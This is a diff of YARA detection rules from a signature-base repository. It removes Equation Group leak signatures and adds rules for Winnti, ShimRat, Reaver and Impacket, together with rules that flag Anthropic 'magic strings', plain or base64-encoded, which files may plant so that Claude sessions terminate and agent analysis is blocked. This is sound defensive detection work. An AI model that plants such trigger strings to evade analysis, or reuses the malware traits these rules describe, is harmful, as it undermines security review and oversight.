-		$s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 }
-		$op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 }
-		$op2 = { c6 44 24 56 64 88 5c 24 57 }
-		$op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f }
+		$b = { DA A0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $s* ) or all of ( $op* ) )
+		uint16( 0 ) == 0x5a4d and $b at pe.overlay.offset and pe.overlay.size > 100
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Http_Exe : FILE
+rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Mockingjay : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9bb4224e-f900-5f5c-8091-088a4b791ada"
-		date = "2017-04-15"
+		description = "Detects Winnti samples"
+		author = "@br_data repo"
+		id = "9aff9d65-3827-59de-9dc3-38f227155d3d"
+		date = "2019-07-24"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3077-L3094"
+		reference = "https://github.com/br-data/2019-winnti-analyse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_br.yar#L30-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "50d83b157c338830eea6aba2e09e9d513dd5b50e257d1a16c0d51616bfa26a7f"
+		logic_hash = "7a63b6f10cc5feebba16e585cb29d741876e1dc7f4dde3ef43ac76db9c7ad135"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c"
 
 	strings:
-		$s1 = "Copyright (C) Microsoft" fullword wide
-		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
-		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
-		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
+		$load_magic = { C7 44 ?? ?? FF D8 FF E0 }
+		$iter = { E9 EA EB EC ED EE EF F0 }
+		$jpeg = { FF D8 FF E0 00 00 00 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		uint16( 0 ) == 0x5a4d and $jpeg and ( $load_magic or $iter in ( @jpeg [ 1 ] .. @jpeg [ 1 ] + 200 ) ) and for any i in ( 1 .. #jpeg ) : ( uint8( @jpeg [ i ] + 11 ) != 0 )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Parsecapture : FILE
+rule SIGNATURE_BASE_SUSP_Claude_Refusal_Magic_String_Jan26
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "11743260-c5ce-59de-9fcf-0c050eee98ff"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3096-L3111"
+		description = "Detects refusal magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
+		author = "Marius Benthin"
+		id = "13e9c713-0201-5c5c-bc42-de898c0d8b95"
+		date = "2026-01-29"
+		modified = "2026-01-29"
+		reference = "https://x.com/williballenthin/status/2014687699165135150"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L1-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8946bc6d1812a998757a4032755f37aa2be6121a958ebfb6fec90fa60da038fb"
+		hash = "ffa48ed4b7b48897f6756c4222b2606399de0bca627cedfddf61e69986580430"
+		logic_hash = "ae5b451168d03440f84b89d96db2688f828e5dcbcdd1121edf3fb973571d2dbd"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2"
+		quality = 83
+		tags = ""
 
 	strings:
-		$x1 = "* Encrypted log found.  An encryption key must be provided" fullword ascii
-		$x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii
-		$x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii
+		$x1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REFUSAL_" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+		$x1
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Activedirectory_Target : FILE
+rule SIGNATURE_BASE_MAL_Claude_Refusal_Magic_String_Jan26
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1069cabe-7c09-522f-ad3f-05651490b921"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3113-L3127"
+		description = "Detects Base64 variations of refusal magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
+		author = "Marius Benthin"
+		id = "96b73331-989f-5af5-8f17-30b99fcc2800"
+		date = "2026-01-29"
+		modified = "2026-01-29"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L15-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0dee634fe81870b21531046be512e9e54b127207c1910ca5ce5dfab63b1d0603"
-		score = 75
+		logic_hash = "e1c070b77e3568966f605fa47a2b3be917065954bc157e3721ff2fb3ac4d72f7"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36"
+		tags = ""
 
 	strings:
-		$s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
-		$s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide
+		$xb1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REFUSAL_" ascii wide base64 base64wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		$xb1
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Legacy_Dll : HIGHVOL FILE
+rule SIGNATURE_BASE_SUSP_Claude_Redacted_Thinking_Magic_String_Jan26_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "254ff1f7-52ee-57fa-be02-2904e132e25c"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3129-L3144"
+		description = "Detects redacted thinking magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
+		author = "Marius Benthin"
+		id = "005732f9-015a-5741-8b39-b1a32812c96d"
+		date = "2026-01-29"
+		modified = "2026-01-29"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L28-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "923a595737bc83fe05d0ca7301c70e1cb03cecf97dfa99f5967b77b892a9a533"
-		score = 75
-		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d"
+		hash = "ffa48ed4b7b48897f6756c4222b2606399de0bca627cedfddf61e69986580430"
+		logic_hash = "02b85e9df893d6be91f8053ac67884e5a24893ef225ca0e7b3878b38afb79420"
+		score = 65
+		quality = 83
+		tags = ""
 
 	strings:
-		$op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 }
-		$op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 }
-		$op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea }
+		$x1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REDACTED_THINKING_" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		$x1
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Svctouch : FILE
+rule SIGNATURE_BASE_SUSP_Claude_Redacted_Thinking_Magic_String_Jan26_2
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a1246afa-32ba-5730-91a2-b1116160d662"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3146-L3159"
+		description = "Detects Base64 variations of redacted thinking magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
+		author = "Marius Benthin"
+		id = "9c2f1cb1-e70d-5da4-843e-a31b39f492ff"
+		date = "2026-01-29"
+		modified = "2026-01-29"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L42-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0e876611ffe4740141a0454f68cfc7dd3c46e0fd44deeb9f3e0f66c8fccd3745"
+		logic_hash = "3b901ffeaff1e4bef579df00e4e99fe8f9eb4ae9ee8e8bde7a730f0fd4646762"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b"
+		tags = ""
 
 	strings:
-		$s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii
+		$xb1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REDACTED_THINKING_" ascii wide base64 base64wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
+		$xb1
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Pwd_Implant : FILE
+rule SIGNATURE_BASE_Shimrat
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "69d071f0-7214-5972-805a-3c0c1d2346c2"
-		date = "2017-04-15"
+		description = "Detects ShimRat and the ShimRat loader"
+		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
+		id = "21431895-1180-5552-8e82-1589992ffa1d"
+		date = "2015-11-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3161-L3176"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mofang.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f565c42781ff4b0b37e7c00673fb2da2877018317cd415bdb47d4e019485c727"
+		logic_hash = "0dd19e6a65b06bd5846ec224f01c3feea066540317223d1991154b2305882b20"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542"
+		tags = ""
 
 	strings:
-		$s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii
-		$op1 = { 40 50 89 44 24 18 FF 15 34 20 00 }
+		$dll = ".dll"
+		$dat = ".dat"
+		$headersig = "QWERTYUIOPLKJHG"
+		$datasig = "MNBVCXZLKJHGFDS"
+		$datamarker1 = "Data$$00"
+		$datamarker2 = "Data$$01%c%sData"
+		$cmdlineformat = "ping localhost -n 9 /c %s > nul"
+		$demoproject_keyword1 = "Demo"
+		$demoproject_keyword2 = "Win32App"
+		$comspec = "COMSPEC"
+		$shim_func1 = "ShimMain"
+		$shim_func2 = "NotifyShims"
+		$shim_func3 = "GetHookAPIs"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+		($dll and $dat and $headersig and $datasig ) or ( $datamarker1 and $datamarker2 ) or ( $cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec ) or ( $dll and $dat and $shim_func1 and $shim_func2 and $shim_func3 )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Kisucomms_Target_2000 : FILE
+rule SIGNATURE_BASE_Shimratreporter
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "693a82e5-a3f1-5a56-b33d-0daef36bbe5f"
-		date = "2017-04-15"
+		description = "Detects ShimRatReporter"
+		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
+		id = "01688b3c-2f06-518f-939d-4d65529be5ae"
+		date = "2015-11-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3178-L3198"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mofang.yar#L28-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d350228ad779d0453c1077afb2b533036eb1e43e4f74a433d68c781db963ab1"
+		logic_hash = "931d65628e5f0b7c63fe270b0a6cd3890f41a4ee7e253ce056b37f2d55542258"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135"
+		tags = ""
 
 	strings:
-		$s1 = "363<3S3c3l3q3v3{3" fullword ascii
-		$s2 = "3!3%3)3-3135393@5" fullword ascii
-		$op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b }
-		$op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 }
-		$op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb }
+		$IpInfo = "IP-INFO"
+		$NetworkInfo = "Network-INFO"
+		$OsInfo = "OS-INFO"
+		$ProcessInfo = "Process-INFO"
+		$BrowserInfo = "Browser-INFO"
+		$QueryUserInfo = "QueryUser-INFO"
+		$UsersInfo = "Users-INFO"
+		$SoftwareInfo = "Software-INFO"
+		$AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
+		$proxy_str = "(from environment) = %s"
+		$netuserfun = "NetUserEnum"
+		$networkparams = "GetNetworkParams"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or all of ( $op* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sldecoder : FILE
+
+rule SIGNATURE_BASE_Reaver3_Malware_Nov17_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1760e84b-fc40-5d60-9351-3a3134af9e9f"
-		date = "2017-04-15"
+		id = "95419d6f-b657-53c4-840d-9a9e9b00787e"
+		date = "2017-11-11"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3200-L3214"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L14-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "81a74169dc8f93f314f384bd859df07a4ffaaf430b221b440de922fad3497535"
+		logic_hash = "fa141a1d3868bd4a004794bf51dc20086eb2e1446e1fa374834a6f2d84940c0d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce"
+		hash1 = "1813f10bcf74beb582c824c64fff63cb150d178bef93af81d875ca84214307a1"
 
 	strings:
-		$x1 = "Error in conversion. SlDecoder.exe <input filename> <output filename> at command line " fullword wide
-		$x2 = "KeyLogger_Data" fullword wide
+		$s1 = "CPL.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "e722dd50a0e2bc0cab8ca35fc4bf6d99" and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Windows_Implant : FILE
+
+rule SIGNATURE_BASE_Reaver3_Malware_Nov17_2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a82aac49-8843-5420-8b87-f3d7431bc63f"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3216-L3229"
+		id = "423ae050-5087-528e-be0a-c612024dc70a"
+		date = "2017-11-11"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L29-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b6b349c98a328b4bbdd6d8718af8477c36ec219bb0076dd56998395d0ef5f32"
+		logic_hash = "f987876dae35d17fb3ac0d4d3cfe1e00f8977aa696194cc48e53ac1db9d55fca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374"
+		hash1 = "9213f70bce491991c4cbbbd7dc3e67d3a3d535b965d7064973b35c50f265e59b"
+		hash2 = "98eb5465c6330b9b49df2e7c9ad0b1164aa5b35423d9e80495a178eb510cdc1c"
 
 	strings:
-		$s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii
+		$x1 = "WindowsUpdateReaver" fullword wide
+		$s1 = "\\WUpdate.~tmp" ascii
+		$s2 = "\\~WUpdate.lnk" ascii
+		$s3 = "\\services\\" ascii
+		$s4 = "moomjufps" fullword ascii
+		$s5 = "gekmomkege" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "837cc5062a0758335b257ea3b27972b2" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgkd_Msslu64_Msgki_Mssld : FILE
+
+rule SIGNATURE_BASE_Reaver3_Malware_Nov17_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb6d4098-8ede-58ba-9851-7c8b360fb606"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3231-L3256"
+		id = "cc2511a9-8938-5f4d-9802-f73e44609bf9"
+		date = "2017-11-11"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L55-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f61ce58356ffca197d4a2a4aae43414bcb8f2f284dbee818124dd450f4b50cb9"
+		logic_hash = "32654255102aee872402b0910422701f3cd4d0b2b8fc6e83440f325923ab9e2f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0"
-		hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557"
-		hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3"
-		hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e"
-		hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46"
+		hash1 = "18ac3b14300ecfeed4b64a844c16dccb06b0e3513d0954d6c6182f2ea14e4c92"
+		hash2 = "c0f8bb77284b96e07cab1c3fab8800b1bbd030720c74628c4ee5666694ef903d"
+		hash3 = "c906250e0a4c457663e37119ebe1efa1e4b97eef1d975f383ac3243f9f09908c"
+		hash4 = "1fcda755e8fa23d27329e4bc0443a82e1c1e9a6c1691639db256a187365e4db1"
+		hash5 = "d560f44188fb56d3abb11d9508e1167329470de19b811163eb1167534722e666"
 
 	strings:
-		$s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii
-		$s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii
-		$s3 = "iijymqp" fullword ascii
-		$s4 = "AWAVAUATASARAQI" fullword ascii
-		$s5 = "WARASATAUAVM" fullword ascii
-		$op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc }
-		$op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 }
-		$op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 }
+		$s1 = "winhelp.dat" fullword ascii
+		$s2 = "\\microsoft\\Credentials\\" ascii
+		$s3 = "~Update.lnk" fullword ascii
+		$s4 = "winhelp.cpl" fullword ascii
+		$s5 = "\\services\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of ( $s* ) or all of ( $op* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8ee521b2316ddd6af1679eac9f5ed77b" or 4 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallback : FILE
+rule SIGNATURE_BASE_Sunorcal_Malware_Nov17_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
-		date = "2017-04-15"
+		id = "d8a21570-d1d6-52c3-abb2-ecaa86eb7ff0"
+		date = "2017-11-11"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3258-L3272"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L82-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "63a17dd56874085753cae92f70d6248ceaac6eaea99fda0d3a551e4988a73895"
+		logic_hash = "88e6280c04b12b1d8530bafb44afc180685550f1f6bcefb731b3247f6a9529a2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2"
+		hash1 = "cb7c0cf1750baaa11783e93369230ee666b9f3da7298e4d1bb9a07af6a439f2f"
+		hash2 = "799139b5278dc2ac24279cc6c3db44f4ef0ea78ee7b721b0ace38fd8018c51ac"
+		hash3 = "38ea33dab0ba2edd16ecd98cba161c550d1036b253c8666c4110d198948329fb"
 
 	strings:
-		$s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii
-		$s3 = "USAGE: SetCallback <input file> <output file>" fullword ascii
+		$x1 = "kQZ6l5t1kAlsjmBzsCZPrSpQn5tFrChLtTdsgTlOsClKt5pBsDdFrSVshnxMr6ZOpn9slndBsy1jq6lIr216rSNApn9P" fullword ascii
+		$x2 = { 00 00 00 00 00 00 00 00 00 00 00 00 21 21 21 73
+              79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 00 }
+		$x3 = "!!!url!!!" fullword ascii
+		$x4 = "h4NcbkdLrCpFpPQ=" fullword ascii
+		$x5 = "GloablCryptNv1" fullword ascii
+		$x6 = "Gloabl\\CryptNv1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Doublefeaturereader_Doublefeaturereader_0 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Wmiexec : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f662c961-80be-5453-86b1-c4d40ac5b732"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3274-L3293"
+		id = "3c2c7edf-da71-53dc-9ddf-dfbf10838a27"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9049e1fe31917ecc27e57afecd5845afcd966aac83d386b7c0995c1e3378a0d0"
+		logic_hash = "1ac78768ae230aa00f392f7a7886589b14814e9c7379528d2ecd218852086ee4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927"
